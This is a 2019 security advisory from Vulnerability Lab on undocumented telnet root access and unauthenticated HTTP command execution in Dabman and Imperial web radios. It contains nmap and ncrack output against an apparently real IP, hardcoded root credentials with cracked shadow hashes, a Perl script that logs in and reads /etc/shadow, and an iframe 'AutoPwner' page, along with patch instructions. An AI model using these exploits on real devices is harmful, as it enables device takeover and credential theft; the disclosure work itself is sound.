Share
Document Title:  
===============  
Dabman & Imperial (i&d) Web Radio Devices - Undocumented Telnet Backdoor  
& Command Execution Vulnerability  
  
  
References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2183  
  
Video: https://www.vulnerability-lab.com/get_content.php?id=2190  
  
Vulnerability Magazine:  
https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution  
  
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473  
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474  
  
CVE-ID:  
=======  
CVE-2019-13473  
  
  
Release Date:  
=============  
2019-09-09  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
2183  
  
  
Common Vulnerability Scoring System:  
====================================  
9.4  
  
  
Vulnerability Class:  
====================  
Multiple  
  
  
Current Estimated Price:  
========================  
5.000€ - 10.000€  
  
  
Product & Service Introduction:  
===============================  
Since 1993, TELESTAR has been synonymous with quality and a very good  
price/performance ratio in the consumer electronics segment.  
TELESTAR-DIGITAL GmbH distributes high-quality reception technology for  
digital TV reception via satellite (DVB-S), cable (DVBC)  
or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region  
of Germany. The product portfolio includes digital receivers  
and the latest generation of television sets as well as modern  
distribution and single-cable technology, satellite to IP reception  
solutions and radio transmission systems. The product range is rounded  
off by Germany's most comprehensive range of accessories  
for digital television reception.  
  
(Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh )  
  
  
Abstract Advisory Information:  
==============================  
The vulnerability laboratory research team discovered multiple  
vulnerabilities in the dabman and imperial web radio devices series (typ  
d & i).  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2018-06-01: Researcher Notification & Coordination (Security Researcher)  
2018-06-02: Vendor Notification (Telestar Digital Data Security Department)  
2018-06-07: Vendor Response/Feedback (Telestar Digital Data Security  
Department)  
2018-08-30: Vendor Fix/Patch (Service Developer Team)  
2019-09-08: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
Critical  
  
  
Authentication Type:  
====================  
Pre auth - no privileges  
  
  
User Interaction:  
=================  
No User Interaction  
  
  
Disclosure Type:  
================  
Coordinated Disclosure  
  
  
Technical Details & Description:  
================================  
1.1  
The dabman and imperial manufactured web radio series (typ d & i)  
suffers from a weak password vulnerability.  
The vulnerabilites allows local and remote attackers to compromise the  
web radios full embedded linux busybox os.  
  
The vulnerability is located within an undocumented telnet service  
(telnetd) of the linux busybox and is  
turned permanently on. The telnetd service uses weak passwords with  
hardcoded credentials on the local embedded  
linux busybox of the internet radio devices. The telnet password can be  
cracked by usage of simple manual password  
bruteforce technics or by basic automated attacks with scripts (exp.  
ncrack). After receiving the password the  
remote or local network attacker can unauthorized login to the internet  
radio device to use the embedded linux  
busybox operating system.  
  
After the attacker has been logged in as root user, he can open the  
/etc/ path to cat gshadow, shadow and the conf files.  
At the end the attacker has finally full root access on the busybox  
(telnetd), he can access the web-server (httpd) as  
admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg.  
A demo exploit poc is available in the wild.  
  
Vulnerable Protocol(s):  
[+] telnetd  
  
System(s):  
[+] BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)  
(Debian Linux PreRelease - ARM 3.3.2)  
  
Firmware Version(s):  
[+] TN81HH96-g102h-g102  
  
Manufacturer:  
Telestar Digital Gmbh  
  
Affected Version(s):  
[+] Bobs Rock Radio  
[+] Dabman D10  
[+] Dabman i30 Stereo  
[+] Imperial i110  
[+] Imperial i150  
[+] Imperial i200  
[+] Imperial i200-cd  
[+] Imperial i400  
[+] Imperial i450  
[+] Imperial i500-bt  
[+] Imperial i600  
  
  
1.2  
The dabman and imperial manufactured web radio series (typ d & i)  
suffers from a command execution vulnerability.  
The vulnerability allows local and remote attackers unauthorized and  
unauthenticated send commands to comprimise the web radio devices.  
  
The vulnerability is located httpd web-server communcation on port 80  
and 8080. Local and remote attackers can send basic GET  
commands with basic command line tools (exp. curl or modhttp) to modify  
or manipulate http requests. The attacker can also capture  
the http airmusic commands to reverse engineer the radio device for  
unauthorized interactions. The system has no protection mechanism  
to block unauthorized transmit of commands. The web radio as well not  
owns an auth or reminder mechanism to ensure only allowed or  
trusted sources can transmit the commands (client, system, mac , auth ...).  
  
Vulnerable Protocol(s):  
[+] httpd  
  
Module(s):  
[+] UIData (Web UI on 80 or 8080)  
  
Function(s):  
[+] /set_dname  
[+] /mylogo  
[+] /LocalPlay  
[+] /LocalPlay  
[+] /irdevice.xml  
[+] /Sendkey  
[+] /setvol  
[+] /hotkeylist  
[+] /init  
[+] /playlogo.jpg  
[+] /stop  
[+] /exit  
[+] /back  
[+] /playinfo  
  
Parameter(s):  
[+] ?name=PWND  
[+] ?url=./*.jpg  
[+] ?url=/stream.wav&name=*  
[+] ?url=/msg.wav&save=*  
[+] ?key=*  
[+] ?vol=*0&mute=*  
[+] ?language=*  
  
Affected Function(s):  
[+] Air Music Controls  
  
Manufacturer:  
Telestar Digital Gmbh  
  
Affected Version(s):  
[+] Bobs Rock Radio  
[+] Dabman D10  
[+] Dabman i30 Stereo  
[+] Imperial i110  
[+] Imperial i150  
[+] Imperial i200  
[+] Imperial i200-cd  
[+] Imperial i400  
[+] Imperial i450  
[+] Imperial i500-bt  
[+] Imperial i600  
  
  
Proof of Concept (PoC):  
=======================  
1.1 Undocumented Telnet Service (telnetd)  
The security vulnerability can be exploited by local and remote  
attackers without user interaction or privileged user account.  
For security demonstration or to reproduce follow the provided  
information and steps below to continue.  
  
  
Nmap Portscan  
Scanning R-MAVERIC-EMAC_1_01_018 (93.234.141.215) [1000 ports]  
Discovered open port 8080/tcp on 93.234.141.215  
Discovered open port 80/tcp on 93.234.141.215  
Discovered open port 23/tcp on 93.234.141.215  
Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports)  
Initiating Service scan at 14:48  
Scanning 3 services on R-MAVERIC-EMAC_1_01_018 (93.234.141.215)  
Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host)  
Initiating OS detection (try #1) against R-MAVERIC-EMAC_1_01_018  
(93.234.141.215)  
NSE: Script scanning 93.234.141.215.  
Initiating NSE at 14:48  
Completed NSE at 14:49, 30.61s elapsed  
Initiating NSE at 14:49  
Completed NSE at 14:49, 0.00s elapsed  
Nmap scan report for R-MAVERIC-EMAC_1_01_018 (93.234.141.215)  
Host is up (0.010s latency).  
Not shown: 997 closed ports  
PORT STATE SERVICE VERSION  
23/tcp open telnet security DVR telnetd (many brands)  
80/tcp open tcpwrapped  
|_http-title: AirMusic  
8080/tcp open http BusyBox httpd 1.13  
| http-methods:  
|_ Supported Methods: GET  
|_http-title: 404 Not Found  
MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology)  
Device type: general purpose  
Running: Linux 2.6.X  
OS CPE: cpe:/o:linux:linux_kernel:2.6  
OS details: Linux 2.6.16 - 2.6.35 (embedded)  
Uptime guess: 5.967 days (since Sun Jun 23 15:36:08 2019)  
Network Distance: 1 hop  
TCP Sequence Prediction: Difficulty=197 (Good luck!)  
IP ID Sequence Generation: All zeros  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  
  
  
NCrack [telnetd] (ncrack -v --user root [IP]:[PORT])  
C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23  
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21  
Mitteleuropõische Sommerzeit  
Discovered credentials on telnet://93.234.141.215:23 'root' 'password'  
Discovered credentials on telnet://93.234.141.215:23 'root' 'password1'  
Discovered credentials on telnet://93.234.141.215:23 'root' 'password2'  
Discovered credentials on telnet://93.234.141.215:23 'root' 'password123'  
Discovered credentials on telnet://93.234.141.215:23 'root' 'password12'  
Discovered credentials on telnet://93.234.141.215:23 'root' 'password3'  
Discovered credentials on telnet://93.234.141.215:23 'root' 'password!'  
telnet://93.234.141.215:23 finished. Too many failed attemps.  
Discovered credentials for telnet on 93.234.141.215 23/tcp:  
93.234.141.215 23/tcp telnet: 'root' 'password'  
93.234.141.215 23/tcp telnet: 'root' 'password1'  
93.234.141.215 23/tcp telnet: 'root' 'password2'  
93.234.141.215 23/tcp telnet: 'root' 'password123'  
93.234.141.215 23/tcp telnet: 'root' 'password12'  
93.234.141.215 23/tcp telnet: 'root' 'password3'  
93.234.141.215 23/tcp telnet: 'root' 'password!'  
Ncrack done: 1 service scanned in 273.29 seconds.  
Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117  
Ncrack finished.  
  
  
System:  
BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)  
  
Kernel:  
9)20151217_M8_TFT_7601_Kernel  
  
OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC:  
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC:  
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian  
prerelease)Aaeabi.shstrtab.init.text.fini.  
rodata.ARM.extab.ARM.exidx.eh_frame.init_array.  
fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes  
  
  
Built-in commands:  
. : [ [[ bg break cd chdir continue echo eval exec exit export  
false fg hash help jobs kill local printf pwd read readonly return  
set shift source test times trap true type ulimit umask unset wait  
  
Currently defined functions:  
[, [[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput,  
gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc,  
login,  
ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod,  
route,  
run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc,  
udhcpd, umount, unlzma, usleep, zcat  
  
  
Username: root  
Password: password & password!  
  
shadow  
root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey)  
ftp:!:0:::::: (decrypted: empty/blank)  
usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond)  
  
gshadow  
root:::root,mldonkey  
  
  
PoC: Exploit  
use Net::Telnet ();  
use Cwd;  
$file="inputLog.txt";  
$ofile="outputlog.txt";  
  
# For local network change to localhost or local ip  
@hosts = ("93.234.141.215");  
  
foreach $hostip (sort @hosts)  
{  
$t = new Net::Telnet (Timeout => 10,  
Input_log => $file,  
Prompt => "/>/");  
print "nnConnecting to undocumented Telnet Service of Imperial or  
Dabman Web Radio Service: $hostip ...n";  
print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150,  
i200, i200-cd, i400, i450, i500-bt, i600n";  
$t->open("$hostip");  
$t->login("root","password");  
my @lines = $t->cmd('cat /etc/shadow');  
print "$hostip: Directories:n";  
print "@lines n";  
$t->close;  
}  
  
  
  
1.2 AirMusic Unauthenticated Command Execution (httpd)  
The security vulnerability can be exploited by local and remote  
attackers without user interaction or privileged user account.  
For security demonstration or to reproduce follow the provided  
information and steps below to continue.  
  
AirMusic Status Interface: http://93.234.141.215:80  
Web-Server HTTPD UIData Path: http://93.234.141.215:8080  
  
Note: Attacks can be performed in the local network (Localhost:80) or  
remotly by requesting the url remote ip adress (93.234.141.215) +  
forwarded remote port(Standard :23).  
  
Get device name from Device  
http://93.234.141.215:80/irdevice.xml  
  
Set device name  
http://93.234.141.215:80/set_dname?name=PWND  
  
Set boot-logo (HTTP URL, requirement: JPG)  
http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg  
  
Display or retrieve channel logo  
http://93.234.141.215:80:8080/playlogo.jpg  
  
Changing the main menu with the selected language  
http://93.234.141.215:80/init?language=us  
  
Play stream  
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME  
  
Save audio file as message  
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1  
  
Recall channel hotkeys  
http://93.234.141.215:80/hotkeylist  
  
Current playback data  
http://93.234.141.215:80/playinfo  
  
Set volume from 0-31 & mute function  
http://93.234.141.215:80/setvol?vol=10&mute=0  
  
Reset  
http://93.234.141.215:80/back  
  
Set stop  
http://93.234.141.215:80/stop  
  
Activate all back  
http://93.234.141.215:80/exit  
  
Send keystroke combo  
http://93.234.141.215:80/Sendkey?key=3  
  
  
PoC: Exploit  
<html>  
<head><body>  
<title>Dabman & Imerpial - HTML AutoPwner</title>  
<iframe src=http://93.234.141.215:80/set_dname?name=PWND></iframe>  
<iframe  
src=http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg></iframe>  
<iframe  
src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME></iframe>  
<iframe  
src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1></iframe>  
</body></head>  
<html>  
  
  
PoC: Checker for Modifications  
#!/usr/bin/perl  
  
use strict;  
use warnings;  
use LWP::Simple;  
  
my $url1 = 'http://93.234.141.215:80/';  
my $source1 = get( $url1 );  
  
my $url2 = 'http://93.234.141.215:80/';  
my $source2 = get( $url2 );  
  
print $source1;  
print $source1;  
  
  
Solution - Fix & Patch:  
=======================  
A fresh updated version is available by the manufacturer telestar to  
resolve the vulnerabilities in all i & d series products.  
It is recommended to install the updates as quick as possible to ensure  
the digital security.  
  
1. Set the device to the factory setting  
2. Select language  
3. Switch off the device  
4. Switch on the device  
5. Network setup  
6. Wait for "New Software" message  
7. Press OK to start the update  
8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624  
  
  
Security Risk:  
==============  
The security risk of the vulnerabilities in the online web radio with  
wifi and user interface are estimated as critical.  
The vulnerability can be exploited by local attackers in a network or by  
remote attackers without user interaction or  
further privileged user accounts. The potential of the issue being  
exploited in thousends of end user devices all over europe  
is estimated as high. The issue has the potential that could be used by  
remote attackers for spreading randomware / malware,  
mass defacements, compromises for further linux network attacks or being  
part of a criminal acting iot botnet.  
  
  
Credits & Authors:  
==================  
Benjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM] -  
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without  
any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability  
and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct,  
indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been  
advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or  
incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies,  
deface websites, hack into databases or trade with stolen data.  
  
Domains: www.vulnerability-lab.com www.vuln-lab.com   
www.vulnerability-db.com  
Services: magazine.vulnerability-lab.com  
paste.vulnerability-db.com infosec.vulnerability-db.com  
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab   
youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php  
vulnerability-lab.com/rss/rss_upcoming.php  
vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php  
vulnerability-lab.com/register.php  
vulnerability-lab.com/list-of-bug-bounty-programs.php  
  
Any modified copy or reproduction, including partially usages, of this  
file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified  
form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers.  
All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the  
specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.  
  
Copyright © 2019 | Vulnerability Laboratory - [Evolution  
Security GmbH]™  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com